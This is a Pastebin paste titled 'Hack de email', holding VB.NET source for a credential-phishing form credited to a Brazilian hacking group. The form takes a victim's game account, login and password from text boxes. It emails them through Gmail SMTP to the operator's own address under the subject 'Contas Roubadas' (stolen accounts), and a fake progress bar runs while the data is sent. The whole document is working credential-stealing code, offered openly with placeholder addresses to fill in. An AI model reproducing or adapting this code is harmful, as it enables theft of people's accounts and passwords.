Guest User

Hack de email

a guest
Jun 12th, 2017
42
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 'CREDITOS: GABU THELINK
  2. 'FACEBOOK: https://www.facebook.com/GabuScott
  3. 'GRUPO FACEBOOK: https://www.facebook.com/groups/FsocietyBrazil/
  4. 'CANAL YOUTUBE: https://www.youtube.com/channel/UCSz8KUkrOp9YGJ1QfH9qKvA
  5.  
  6. Imports System.Net.Mail
  7. Public Class Form1
  8.     Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
  9.         'ProgressBar
  10.        'Esse codigo vai fazer a barrinha carregar quando botão for clicado
  11.        ProgressBar1.Value = ProgressBar1.Value + 1
  12.         If ProgressBar1.Value = ProgressBar1.Maximum Then
  13.             ProgressBar1.Value = 0
  14.             Timer1.Stop()
  15.             Timer1.Enabled = False
  16.             TextBox1.Enabled = True
  17.             TextBox2.Enabled = True
  18.         End If
  19.     End Sub
  20.     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  21.         Dim MyMailMessage As New MailMessage()
  22.         Dim SMTPServer As New SmtpClient("smtp.gmail.com")
  23.         'Email
  24.        MyMailMessage.From = New MailAddress("SeuEmail@gmail.com")
  25.         'Destinatario
  26.        MyMailMessage.To.Add("SeuEmail@gmail.com")
  27.         'Titulo
  28.        MyMailMessage.Subject = ("Contas Roubadas")
  29.         'Informaçoes
  30.        MyMailMessage.Body = ("MU:   " & TextBox1.Text & "Login:   " & TextBox2.Text & " Senha:   " & TextBox3.Text)
  31.         'Corps
  32.        'SMTP
  33.        'Porta
  34.        SMTPServer.Port = ("587")
  35.         SMTPServer.Credentials = New System.Net.NetworkCredential("SeuEmail@gmail.com", "Sua Senha")
  36.         'Email e Senha
  37.        SMTPServer.EnableSsl = True
  38.         Try
  39.             SMTPServer.Send(MyMailMessage)
  40.         Catch ex As Exception
  41.  
  42.         End Try
  43.  
  44.         'Envio
  45.        Timer1.Enabled = True
  46.         Timer1.Start()
  47.         Timer1.Interval = 1000
  48.         ' = 1min
  49.        TextBox1.Enabled = False
  50.         TextBox2.Enabled = False
  51.         TextBox3.Enabled = False
  52.  
  53.     End Sub
  54.  
  55.  
  56. End Class
Add Comment
Please, Sign In to add comment